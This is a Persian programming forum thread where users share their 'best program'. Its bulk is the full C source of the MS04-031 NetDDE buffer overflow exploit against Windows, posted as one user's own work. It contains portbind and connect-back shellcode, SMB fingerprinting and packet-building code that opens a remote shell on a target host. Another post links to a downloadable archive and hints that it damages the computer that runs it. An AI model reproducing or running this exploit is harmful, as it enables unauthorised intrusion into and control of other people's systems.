از اونجايي كه اساتيدي در اين فروم فعاليت دارند گفتم فرصت رو مغتنم بشمارم و يه تاپيك با عنوان بهترين برنامه اي كه تا به حال نوشتيد (به هر زباني) راه بندازيم!
تا بقيه از اين برنامه ها بهره ببرن .
فقط جون .!..!. كپي نكنين:19:
از اونجايي كه اساتيدي در اين فروم فعاليت دارند گفتم فرصت رو مغتنم بشمارم و يه تاپيك با عنوان بهترين برنامه اي كه تا به حال نوشتيد (به هر زباني) راه بندازيم!
تا بقيه از اين برنامه ها بهره ببرن .
فقط جون .!..!. كپي نكنين:19:
فقط مشاهده ...!
نااميد شدم رفت.:41:
پس اين فروم هم مثل بقيه فروم ها پر از افرادي هست كه فقط چهارتا اصطلاح حفظ كردن و ...
این بهترینش بوده :
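#include <stdio.h>

/*
 * Minimal program: print a greeting and exit with status 0.
 * The original spelled the directive "#incldue", which does not compile.
 */
int main(void)
{
    printf("Hello World!\n");
    return 0;
}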
مال من اين بوده.......
کد:
/* #define _WIN32 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef _WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#endif
/* targets table */
/*
 * Per-OS entries selected by the <target> command-line index (see vargs()
 * and usage()). jmpaddr is the value main() copies, as 4 bytes, into
 * jmpcode at offset 80; the "- 0x20" presumably offsets the "[eax+20h]"
 * mentioned in the comment above jmpcode[] — not verified here.
 * jmpaddr is a long: 4 bytes on Win32, but 8 on LP64, where only the
 * low 4 host-order bytes are copied and usage()'s "%x" does not match.
 */
struct targets {
int num;
char name[50];
long jmpaddr;
}
target[]= {
{ 0, "WinXP [universal] ", 0x00abfb1c - 0x20 },
{ 1, "Win2K [universal] ", 0x009efb60 - 0x20 }
};
/* portbind shellcode */
/*
 * Raw x86 payload bytes, not disassembled in this review. Selected by
 * packet_assembly() when backip == 0; SET_PORTBIND_PORT() patches the
 * listen port into it at byte offset 300 before sizeof(portbindsc)-1
 * bytes are copied into the message.
 */
unsigned char portbindsc[] =
"\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b"
"\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78"
"\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b"
"\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03"
"\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b"
"\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c"
"\x61\xc3\xeb\x3d\xad\x50\x52\xe8\xa8\xff\xff\xff\x89\x07\x83\xc4"
"\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72\xfe\xb3"
"\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xa4\x1a\x70"
"\xc7\xa4\xad\x2e\xe9\xe5\x49\x86\x49\xcb\xed\xfc\x3b\xe7\x79\xc6"
"\x79\x83\xec\x60\x8b\xec\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5e"
"\xe8\x3d\xff\xff\xff\x8b\xd0\x83\xee\x36\x8d\x7d\x04\x8b\xce\x83"
"\xc1\x10\xe8\x9d\xff\xff\xff\x83\xc1\x18\x33\xc0\x66\xb8\x33\x32"
"\x50\x68\x77\x73\x32\x5f\x8b\xdc\x51\x52\x53\xff\x55\x04\x5a\x59"
"\x8b\xd0\xe8\x7d\xff\xff\xff\xb8\x01\x63\x6d\x64\xc1\xf8\x08\x50"
"\x89\x65\x34\x33\xc0\x66\xb8\x90\x01\x2b\xe0\x54\x83\xc0\x72\x50"
"\xff\x55\x24\x33\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x14"
"\x8b\xf0\x33\xc0\x33\xdb\x50\x50\x50\xb8\x02\x01\x11\x5c\xfe\xcc"
"\x50\x8b\xc4\xb3\x10\x53\x50\x56\xff\x55\x18\x53\x56\xff\x55\x1c"
"\x53\x8b\xd4\x2b\xe3\x8b\xcc\x52\x51\x56\xff\x55\x20\x8b\xf0\x33"
"\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa\x5f\xc6\x07\x44"
"\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab\x5f\x33\xc0\x8d"
"\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\xff\x75\x34\x50"
"\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff\x77\x38\xff\x55"
"\x28\xff\x55\x0c";
/* connectback shellcode */
/*
 * Raw x86 payload bytes, not disassembled in this review. Selected by
 * packet_assembly() when backip != 0; SET_CONNECTBACK_IP() and
 * SET_CONNECTBACK_PORT() patch the address and port into it at byte
 * offsets 283 and 290 before sizeof(connectbacksc)-1 bytes are copied.
 */
unsigned char connectbacksc[] =
"\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b"
"\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78"
"\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b"
"\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03"
"\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b"
"\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c"
"\x61\xc3\xeb\x35\xad\x50\x52\xe8\xa8\xff\xff\xff\x89\x07\x83\xc4"
"\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72\xfe\xb3"
"\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xec\xf9\xaa"
"\x60\xcb\xed\xfc\x3b\xe7\x79\xc6\x79\x83\xec\x60\x8b\xec\xeb\x02"
"\xeb\x05\xe8\xf9\xff\xff\xff\x5e\xe8\x45\xff\xff\xff\x8b\xd0\x83"
"\xee\x2e\x8d\x7d\x04\x8b\xce\x83\xc1\x10\xe8\xa5\xff\xff\xff\x83"
"\xc1\x10\x33\xc0\x66\xb8\x33\x32\x50\x68\x77\x73\x32\x5f\x8b\xdc"
"\x51\x52\x53\xff\x55\x04\x5a\x59\x8b\xd0\xe8\x85\xff\xff\xff\xb8"
"\x01\x63\x6d\x64\xc1\xf8\x08\x50\x89\x65\x30\x33\xc0\x66\xb8\x90"
"\x01\x2b\xe0\x54\x83\xc0\x72\x50\xff\x55\x1c\x33\xc0\x50\x50\x50"
"\x50\x40\x50\x40\x50\xff\x55\x14\x8b\xf0\x68\x7f\x01\x01\x01\xb8"
"\x02\x01\x11\x5c\xfe\xcc\x50\x8b\xdc\x33\xc0\xb0\x10\x50\x53\x56"
"\xff\x55\x18\x33\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa"
"\x5f\xc6\x07\x44\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab"
"\x5f\x33\xc0\x8d\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50"
"\xff\x75\x30\x50\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff"
"\x77\x38\xff\x55\x20\xff\x55\x0c";
/*
 * In-place patches of the payload arrays at fixed byte offsets. Each one
 * stores through a cast pointer, i.e. an unaligned, type-punned write
 * (strict-aliasing UB); memcpy((buf)+off, &v, sizeof v) is the
 * well-defined form. Callers pass the port already converted with
 * htons() and backip as returned by inet_addr() (network byte order).
 */
#define SET_PORTBIND_PORT(buf, port) *(unsigned short *)(((buf)+300)) = (port)
#define SET_CONNECTBACK_IP(buf, ip) *(unsigned long *)(((buf)+283)) = (ip)
#define SET_CONNECTBACK_PORT(buf, port) *(unsigned short *)(((buf)+290)) = (port)
/*
eax = target[].jmpaddr -> stack -> jmpcode -> shellcode
1. 0100D605 call dword ptr [eax+20h]
2. jmpcode
3. shellcode
*/
/*
 * Stub bytes followed by a hex-encoded ASCII banner; the four "\xBB"
 * bytes sit at offset 80, which is the slot main() overwrites with
 * target[ntarget].jmpaddr. packet_assembly() receives this array as its
 * "name" argument and copies strlen()+4 bytes of it.
 */
char jmpcode[] =
"\x90\x90\x90\x90\x66\x81\xC7\x20\x03\xFF\xE7\x90\x90\x90\x90\x90"
"\x50\x6f\x43\x20\x66\x6f\x72\x20\x4e\x65\x74\x44\x44\x45\x20\x28"
"\x4d\x53\x30\x34\x2d\x30\x33\x31\x29\x2e\x20\x43\x6f\x70\x79\x72"
"\x69\x67\x68\x74\x20\x28\x63\x29\x20\x32\x30\x30\x34\x2d\x32\x30"
"\x30\x35\x20\x68\x6f\x75\x73\x65\x6f\x66\x64\x61\x62\x75\x73\x2e"
"\xBB\xBB\xBB\xBB" /* => eax */
"PADPAD";
/*
 * NetBIOS session request (type byte 0x81) carrying a fixed encoded
 * called/calling name pair; sent by smb_get_name() with sizeof-1 bytes
 * (the terminating NUL is not part of the message).
 */
char smb_sesreq[] =
"\x81\x00\x00\x44\x20\x43\x4b\x46\x44\x45\x4e\x45\x43\x46\x44\x45"
"\x46\x46\x43\x46\x47\x45\x46\x46\x43\x43\x41\x43\x41\x43\x41\x43"
"\x41\x43\x41\x43\x41\x00\x20\x45\x4b\x45\x44\x46\x45\x45\x49\x45"
"\x44\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43"
"\x41\x43\x41\x43\x41\x41\x41\x00";
/*
 * SMB negotiate-protocol request ("\xffSMB", command 0x72) offering the
 * single dialect "NT LM 0.12"; sent by smb_get_name() after the session
 * request, again with sizeof-1 bytes.
 */
char smb_negotiate[] =
"\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x5c\x02"
"\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54\x20\x4c\x4d\x20\x30\x2e"
"\x31\x32\x00";
/* fixed trailer placed after the message body by packet_assembly() */
char d1[] =
"\x0d\x12\x0b\x06\x0d\x18\x1c\x01\x10\x03\x12\x08\x1d\x1f\x0a\x0a"
"\x16\x02\x17\x0e\x1b\x0d";
/*
 * Session request header used by main(): type 0x81 and a length of
 * 0x44 = 68, which is exactly the 32+32+4 bytes main() appends after it.
 */
char req1[] =
"\x81\x00\x00\x44";
/* fixed 32-character encoded calling name appended by main() */
char req2[] =
"CACACACACACACACACACACACACACACABP";
/* header fragments; packet_assembly() lays them out as h1, len, h2, len, h3, checksum */
char h1[] =
"\x45\x44\x44\x4E\x00\x00\x00";
char h2[] =
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
char h3[] =
"\x00\x00\x02\x02\x00\x00\x00\x01\x00\x00\x00";
unsigned long ndlen = 0;      /* set by packet_assembly(): total size of its buffer; main() uses it as the send() length */
unsigned long ntarget = 0;    /* index into target[], set by vargs() */
unsigned long backip = 0;     /* connect-back address from inet_addr() (network order); 0 selects the portbind payload */
unsigned short bindport = 0;  /* port in host order; htons()'d when patched into a payload */
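/*
 * Read the little-endian 32-bit word stored at data[i..i+3].
 *
 * Each byte is widened to unsigned long before shifting: in the original
 * the bytes were promoted to int, so "data[i+3] << 24" overflowed (UB)
 * whenever that byte was >= 0x80. The caller must guarantee that
 * i + 3 is a valid index into data.
 */
unsigned long
fixx(unsigned char *data, unsigned long i)
{
    return ((unsigned long)data[i+3] << 24) |
           ((unsigned long)data[i+2] << 16) |
           ((unsigned long)data[i+1] << 8) |
           (unsigned long)data[i];
}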
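/*
 * Checksum used for the NetDDE header and body: start from 0xFFFFFFFF,
 * add every little-endian 32-bit word that starts before the last four
 * bytes, then add the remaining bytes one at a time (so the final four
 * bytes are always summed bytewise, as in the original).
 *
 * The original computed len = dlen - 4 with no guard, so dlen < 4
 * wrapped to a huge bound and read far past data; such inputs now go
 * straight to the byte loop. Only the low 32 bits are meaningful:
 * packet_assembly() copies 4 bytes of the result.
 */
unsigned long
chksum(unsigned char *data, unsigned long dlen)
{
    unsigned long chk = 0xFFFFFFFF;
    unsigned long i = 0;

    if (dlen >= 4) {
        /* whole words: stop before the last four bytes, like the original */
        for (; i < dlen - 4; i += 4)
            chk += fixx(data, i);
    }
    /* trailing bytes */
    for (; i < dlen; i++)
        chk += data[i];
    return chk;
}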
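/*
 * First-level NetBIOS name encoding: pad the name with spaces to 15
 * bytes, append the one-byte service type, then write each of the 16
 * bytes as two characters ('A' + high nibble, 'A' + low nibble).
 *
 * ndata   NUL-terminated name; only the first 15 bytes are used. The
 *         original copied strlen(ndata) bytes into a 17-byte buffer and
 *         overflowed it for longer names; they are now truncated.
 * service service byte stored at position 15.
 * Returns a 32-character NUL-terminated string allocated with calloc()
 * that the caller must free(), or NULL if the allocation fails.
 */
char *
netbios_encode(char *ndata, char service)
{
    unsigned char raw[16];
    char *nret;
    unsigned long nlen;
    int i;

    nlen = strlen(ndata);
    if (nlen > 15)
        nlen = 15;
    memset(raw, 0x20, 15);          /* space padding, as the original's strcat loop */
    memcpy(raw, ndata, nlen);
    raw[15] = (unsigned char)service;

    nret = calloc(sizeof raw * 2 + 1, 1);
    if (nret == NULL)
        return NULL;
    for (i = 0; i < (int)sizeof raw; i++) {
        /* unsigned nibble split: the original divided a plain char, which
           would go negative for bytes >= 0x80 on signed-char platforms */
        nret[2*i]     = (char)(0x41 + (raw[i] >> 4));
        nret[2*i + 1] = (char)(0x41 + (raw[i] & 0x0F));
    }
    return nret;
}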
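/*
 * Locate the name field in a negotiate reply: skip the 91-byte fixed
 * prefix and return a pointer just past the first run of three NUL
 * bytes found after it.
 *
 * data  reply buffer; len  number of valid bytes in it.
 * Returns a pointer into data (at most data + len, one past the end,
 * when the run ends the buffer) or NULL when no such run lies inside
 * the first len bytes. The original scanned ptr[i] for i up to len-1
 * with ptr = data+91, i.e. 91 bytes beyond what the caller received,
 * and for len < 3 the bound "len - 3" wrapped to a huge value; both
 * over-reads are closed here.
 */
unsigned char *
find_smbname(unsigned char *data, unsigned long len)
{
    unsigned char *ptr;
    unsigned long avail, i;

    if (len < 91 + 3)
        return NULL;
    ptr = data + 91;
    avail = len - 91;               /* bytes actually available after the prefix */
    for (i = 0; i + 2 < avail; i++) {
        if (ptr[i] == 0 && ptr[i+1] == 0 && ptr[i+2] == 0)
            return ptr + i + 3;
    }
    return NULL;
}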
/* fingerprinting */
/*
 * smb_get_name: active NetBIOS/SMB fingerprint of one host.
 * Resolves ip, connects to TCP port 139, sends smb_sesreq and then
 * smb_negotiate (each followed by a fixed one-second wait), and copies
 * the host name that find_smbname() locates in the negotiate reply,
 * dropping NUL bytes. Returns a calloc'd string the caller must free(),
 * or NULL on any failure (resolution, socket, connect, recv, no name).
 *
 * Portability: Sleep() and closesocket() come from the Win32 headers; the
 * #else branch defines no replacements, so this does not build on POSIX
 * as written.
 */
unsigned char *
smb_get_name(char *ip)
{
int sock, r;
unsigned long smbname_len;
unsigned char *name = NULL, *smbname;
struct sockaddr_in s;
struct hostent *he;
unsigned char buf[256];
/* gethostbyname() is obsolete (getaddrinfo is the current API) and returns static storage */
if ((he = gethostbyname(ip)) == NULL) {
printf("[-] Unable to resolve %s\n", ip);
return NULL;
}
sock = socket(AF_INET, SOCK_STREAM,
IPPROTO_TCP);
if (sock < 0) return NULL;
s.sin_family = AF_INET;
s.sin_addr = *((struct in_addr *)he->h_addr);
s.sin_port = htons(139);
memset(&(s.sin_zero), '\0', 8);
memset(buf, 0, 256);
printf("[*] Connecting to %s:139 ... ", ip);
r = connect(sock, (struct sockaddr *) &s, sizeof(struct
sockaddr_in));
if (r == 0) {
printf("OK\n[*] Fingerprinting... ");
/* sending session request */
/* send() results are never checked; a failed send only shows up when recv() fails */
send(sock, smb_sesreq, sizeof(smb_sesreq)-1,
0);
/* fixed delay instead of reading until the reply is complete */
Sleep(1000);
r = recv(sock, (char *)buf, 256, 0);
/* r == 0 (peer closed the connection) passes this test and continues */
if (r < 0) goto err;
memset(buf, 0, 256);
/* sending negotiation request */
send(sock, smb_negotiate,
sizeof(smb_negotiate)-1, 0);
Sleep(1000);
r = recv(sock, (char *)buf, 256, 0);
if (r < 0) goto err;
printf("OK\n");
smbname = find_smbname(buf, r);
if (smbname == NULL) goto err;
/* NOTE(review): this is the name's OFFSET into buf, not its length. The
   loop below reads that many bytes starting at smbname, which stays
   inside buf[256] only while 2 * offset <= 256 — confirm intent. */
smbname_len = smbname - buf;
/* calloc() result is not checked before name[r] is written; if no NUL
   byte is skipped, name ends up without a terminator */
name = (unsigned char *)calloc(smbname_len,
1);
/* decoding */
r = 0;
while (smbname_len) {
if (*smbname != '\x00') {
name[r] = *smbname;
r++;
}
smbname++;
smbname_len--;
}
} else {
printf("failed\n[-] Can't connect to %s:139\n", ip);
}
err:
shutdown(sock, 1);
closesocket(sock);
return name;
}
/* NetDDE packet */
/*
 * packet_assembly: build the message main() sends once the session is up.
 *   name  the jmpcode stub (main() passes jmpcode);
 *   host  the space-padded NetBIOS name (main() passes hn2).
 * Buffer layout, in order: 4-byte length (network order), 4-byte checksum
 * of the header, the header (h1, len, h2, len, h3, checksum of the body),
 * the body (hmain, six length bytes, a NUL, name+"\x01", host+"\x01",
 * hod, "\x2e"), d1, 154 x 4 NOP bytes, then portbindsc or connectbacksc
 * depending on backip. Sets the global ndlen to the number of bytes to
 * send. Returns a calloc'd buffer the caller must free(); the four
 * scratch allocations are freed here. No calloc() result is checked.
 */
char *
packet_assembly(char *name, char *host)
{
char *main, *header, *data;   /* "main" is a local buffer here, not the entry point */
char *lname, *rhost;
unsigned long llen, rlen, len, hlen, dlen, csum, i;
unsigned char name_hi, name_low, rhost_hi,
rhost_low;
unsigned char hod_hi, hod_low, len_hi, len_low;
unsigned char nops[] = "\x90\x90\x90\x90"; /* nops */
char hod[] = "HOD-HOD\x01";
char hmain[] = "\x01\x00\xBE\x05\x0A\x00\x00";
char tmp[8];
/* +4 copies past the first NUL in name — presumably so a zero byte in the
   4-byte value main() patched into jmpcode does not cut the copy short;
   confirm against jmpcode's layout */
llen = strlen(name) + 4;
rlen = strlen(host);
lname = (char *)calloc(llen + 3, 1);
rhost = (char *)calloc(rlen + 3, 1);
memcpy(lname, name, llen);
strcpy(rhost, host);
memcpy(lname + llen, "\x01", 1);
strcat(rhost, "\x01");
/* 16-bit big-endian length fields, emitted as a high and a low byte */
name_hi = (unsigned char) ((llen+1) / 256);
name_low = (unsigned char) ((llen+1) % 256);
rhost_hi = (unsigned char) ((rlen + llen + 2) / 256);
rhost_low = (unsigned char) ((rlen + llen + 2) % 256);
len = sizeof(hod) - 1;
hod_hi = (unsigned char) (len / 256);
hod_low = (unsigned char) (len % 256);
main = (char *)calloc( sizeof(hod)-1 +
sizeof(hmain)-1 +
llen + rlen +
11, 1 );
memcpy(main, hmain, sizeof(hmain)-1);
/* tmp holds 6 bytes plus NUL (fits in 8); "%c" with 0 still emits a byte
   and memcpy copies exactly 6, so embedded zeros survive */
sprintf(tmp, "%c%c%c%c%c%c", name_hi, name_low,
rhost_hi, rhost_low, hod_hi, hod_low);
memcpy(main+sizeof(hmain)-1, tmp, 6);
memcpy(main+sizeof(hmain)-1+6, "\x00", 1);
memcpy(main+sizeof(hmain)-1+7, lname, llen+1);
memcpy(main+sizeof(hmain)-1+7+llen+1, rhost,
rlen+1);
memcpy(main+sizeof(hmain)-1+7+llen+1+rlen+1, hod,
sizeof(hod)-1);
memcpy(main+sizeof(hmain)-1+7+llen+1+rlen+1+sizeof(hod)-1,
"\x2e", 1);
/* total body length: the same sum the running offsets above build up */
len =
sizeof(hmain)-1+7+llen+1+rlen+1+sizeof(hod)-1+1;
len_hi = (unsigned char) (len / 256);
len_low = (unsigned char) (len % 256);
/* header */
header = (char *)calloc(sizeof(h1)-1 +
sizeof(h2)-1 +
sizeof(h3)-1 +
9, 1);
memcpy(header, h1, sizeof(h1)-1);
sprintf(tmp, "%c%c", len_hi, len_low);
memcpy(header+sizeof(h1)-1, tmp, 2);
memcpy(header+sizeof(h1)-1+2, h2, sizeof(h2)-1);
memcpy(header+sizeof(h1)-1+2+sizeof(h2)-1, tmp, 2);
memcpy(header+sizeof(h1)-1+2+sizeof(h2)-1+2, h3,
sizeof(h3)-1);
/* chksum() takes unsigned char *; passing char * is a pointer-sign warning */
csum = chksum(main, len);
/* copies the low 4 bytes of an unsigned long in host order: correct only
   on little-endian hosts (and a truncation where long is 8 bytes) */
memcpy(header+sizeof(h1)-1+sizeof(h2)-1+4
+ sizeof(h3)-1, &csum, 4);
/* data */
hlen = sizeof(h1)-1 + sizeof(h2)-1 + sizeof(h3)-1 + 8;
data = (char *)calloc( sizeof(d1)-1 +
len+hlen +
37 +
1200, 1 );
csum = chksum(header, hlen);
memcpy(data+4, &csum, 4);
memcpy(data+4+4, header, hlen);
memcpy(data+4+4+hlen, main, len);
memcpy(data+4+4+hlen+len, d1, sizeof(d1)-1);
/* nops */
for (i=0; i<154; i++)
memcpy(data+4+4+hlen+len+sizeof(d1)-1 + i*4,
nops, 4);
/* shellcode */
/* the SET_* macros modify the global payload arrays in place (see their
   definitions: unaligned, type-punned stores) */
if (!backip) {
/* portbind */
SET_PORTBIND_PORT(portbindsc,
htons(bindport));
memcpy(data+4+4+hlen+len+sizeof(d1)-1+154*4,
portbindsc, sizeof(portbindsc)-1);
dlen =
4+hlen+len+sizeof(d1)-1+sizeof(portbindsc)-1+154*4;
} else {
/* connectback */
SET_CONNECTBACK_IP(connectbacksc,
backip);
SET_CONNECTBACK_PORT(connectbacksc,
htons(bindport));
memcpy(data+4+4+hlen+len+sizeof(d1)-1+154*4,
connectbacksc, sizeof(connectbacksc)-1);
dlen =
4+hlen+len+sizeof(d1)-1+sizeof(connectbacksc)-1+154*4;
}
/* ndlen (global) is what main() passes to send(); dlen, which excludes
   the 4-byte prefix itself, is written in network order — again only the
   low 4 host-order bytes of the unsigned long are copied */
ndlen = dlen + 4;
dlen = htonl(dlen);
memcpy(data, &dlen, 4);
free(lname);
free(rhost);
free(main);
free(header);
return data;
}
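/*
 * Print the command-line synopsis and the target table, then exit(0).
 *
 * prog is argv[0]. The number of targets is taken from the table instead
 * of the literal 2 so the listing cannot drift from target[], and
 * jmpaddr (a long) is printed with %lx: the original passed a long to
 * "%x", which is undefined where long is wider than int.
 */
void
usage(char *prog)
{
    size_t i, ntargets = sizeof target / sizeof target[0];

    printf("%s <host> <netbios name> <target> <bindport> [connectback IP] [options]\n\n", prog);
    printf("Targets:\n");
    for (i = 0; i < ntargets; i++)
        printf(" %d [0x%.8lx]: %s\n", target[i].num,
               (unsigned long)target[i].jmpaddr, target[i].name);
    printf("\nOptions:\n\t-f: Netbios name fingerprinting\n");
    exit(0);
}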
/*
 * vargs: parse the command line into the globals ntarget, bindport and
 * backip, or run fingerprint-only mode.
 *   argv[1] host (only used for -f here), argv[3] target index,
 *   argv[4] port, argv[5] optional connect-back IP.
 * Any argument from argv[2] onward beginning with "-f" selects
 * fingerprinting: smb_get_name(argv[1]) is printed and the program exits.
 * atoi() reports no errors, so a non-numeric target or port silently
 * becomes 0, and the failure value of inet_addr() is not detected.
 */
void
vargs(int argc, char **argv)
{
int i, finger = 0;
char *nname = NULL;   /* smb_get_name() returns unsigned char *: pointer-sign mismatch */
for (i = 2; i < argc; i++) {
if (argv[i][0] == '-') {
if (argv[i][1] == 'f')
finger = 1;
}
}
/* "argc > 2" is implied by finger, since the loop above starts at index 2 */
if (finger && argc > 2) {
nname = smb_get_name(argv[1]);
if (nname) {
printf("[+] Remote netbios name: %s\n",
nname);
free(nname);
}
exit(0);
} else
if (argc < 5) usage(argv[0]);
/* a negative index wraps in the unsigned ntarget and is rejected by "> 1";
   the literal 1 has to be kept in step with the size of target[] */
if ((ntarget = atoi(argv[3])) > 1) usage(argv[0]);
bindport = (unsigned short)atoi(argv[4]);   /* 0 and out-of-range values are accepted as-is */
if (argc > 5) backip = inet_addr(argv[5]);   /* network byte order already; a result of 0 keeps portbind mode */
return;
}
/*
 * main: command-line entry point.
 *   argv[1] host, argv[2] NetBIOS name, argv[3] target index, argv[4]
 *   port, argv[5] optional connect-back IP, "-f" for fingerprint only
 *   (all parsed by vargs()).
 * Flow: patch target[ntarget].jmpaddr into jmpcode, build a NetBIOS
 * session request around the encoded name, connect to host:139, send
 * it, require a 0x82 (positive session response) reply, then send the
 * buffer from packet_assembly() and exit.
 *
 * Review notes: every error path returns 0 (no distinct exit status) and
 * leaks sockfd, ses_req and hname; calloc() and netbios_encode() results
 * are not checked; WSAStartup()'s result is ignored and WSACleanup() is
 * never called; closesocket() is Win32-only and the #else branch defines
 * no substitute.
 */
int
main (int argc, char **argv)
{
int len, sockfd;
char *host;
char *req;
struct hostent *he;
struct sockaddr_in their_addr;
char rbuf[4096];   /* never initialised; see the rbuf[0] test below */
#ifdef _WIN32
WSADATA wsa;
#endif
char *ses_req;
char *data, *hname;
char *hn, *hn2;
unsigned long req_sz, hname_len, hn_len;
#ifdef _WIN32
WSAStartup(MAKEWORD(2,0), &wsa);
#endif
printf("\n (MS04-031) NetDDE buffer overflow vulnerability PoC\n\n");
printf("\tCopyright (c) 2004-2005 .::[ houseofdabus ]::.\n\n\n");
vargs(argc, argv);
hn = argv[2]; /* target netbios name */
host = argv[1]; /* target host name */
if (strlen(host) > 1024) return 0;   /* silent exit, no message */
/* target jmpaddr */
/* copies the low 4 host-order bytes of a long (little-endian assumed);
   offset 80 is the "\xBB\xBB\xBB\xBB" slot in jmpcode */
memcpy(jmpcode+80, &target[ntarget].jmpaddr, 4);
ses_req = (char *)calloc(sizeof(req1)-1 +
sizeof(req2)-1 +
114, 1);
memcpy(ses_req, req1, sizeof(req1)-1);
memcpy(ses_req+sizeof(req1)-1, "\x20", 1);
/* calloc'd string freed at the end; a NULL return is not handled */
hname = netbios_encode(hn, 0x1F);
hname_len = strlen(hname);
memcpy(ses_req+sizeof(req1)-1+1, hname,
hname_len);
memcpy(ses_req+sizeof(req1)-1+1+hname_len,
"\x00\x20", 2);
memcpy(ses_req+sizeof(req1)-1+1+hname_len+2,
req2, sizeof(req2)-1);
memcpy(ses_req+sizeof(req1)-1+1+hname_len+2+sizeof(req2)-1,
"\x00", 1);
req_sz =
sizeof(req1)-1+sizeof(req2)-1+hname_len+4;
if ((he = gethostbyname(host)) == NULL) {
printf("[-] Unable to resolve %s\n", host);
return 0;
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) <
0) {
printf("[-] Error: socket failed\n");
return 0;
}
req = req1;   /* assigned but never used */
their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(139);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(their_addr.sin_zero), '\0', 8);
/* connecting */
printf("[*] Connecting to %s:139 ... ", host);
/* sizeof(struct sockaddr) rather than sizeof their_addr; the same size on
   the usual platforms, but the latter is the correct form */
if (connect(sockfd, (struct sockaddr *)&their_addr,
sizeof(struct sockaddr)) < 0) {
printf("[-] Error: connect failed\n");
return 0;
}
printf("OK\n");
if (send(sockfd, ses_req, req_sz, 0) < 0) {
printf("[-] Error: send failed\n");
return 0;
}
len = recv(sockfd, rbuf, 4096, 0);
/* len == 0 (peer closed) passes, and the next test then reads an
   uninitialised rbuf[0] */
if (len < 0) return 0;
/* check NetDDE */
/* 0x82 is the NetBIOS positive session response; anything else is
   reported as NetDDE not answering on that name */
if ((unsigned char)rbuf[0] != 0x82) {
printf("[-] NetDDE disabled or wrong netbios name\n");
return 0;
}
/* 16-byte buffer filled from strlen(hn): a name longer than 15 characters
   leaves it unterminated or overflows it (same pattern as netbios_encode) */
hn2 = (char *)calloc(16, 1);
memcpy(hn2, hn, strlen(hn));
hn_len = strlen(hn);
while (hn_len < 15) {
strcat(hn2, "\x20");
hn_len++;
}
/* attacking */
printf("[*] Attacking %s ...", host);
/* packet_assembly() also sets the global ndlen used as the send length below */
data = packet_assembly(jmpcode, hn2);
if (send(sockfd, data, ndlen, 0) < 0) {
printf("\n[-] Error: send failed\n");
return 0;
}
printf("OK.\n");
len = recv(sockfd, rbuf, 4096, 0);   /* result unused */
shutdown(sockfd, 1);
closesocket(sockfd);
free(data);
free(hn2);
free(ses_req);
free(hname);
return 0;
}
با تشكر .
اين يه برنامه ساده ولي جالب به زبان ++c هستش.
فقط توصيه ميكنم وقتي اجراش كنيد كه كارتون با كامپيوتر تمومه و ميخوايد خاموشش كنيد:46:!
کد:http://rapidshare.com/files/229395796/booogh.rar.html
dsa جان ميشه مقداري در مورد اين كدتون توضيح بديد:13:نقل قول:
يا اناليزش كنيد؟
/* #define _WIN32 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef _WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#endif
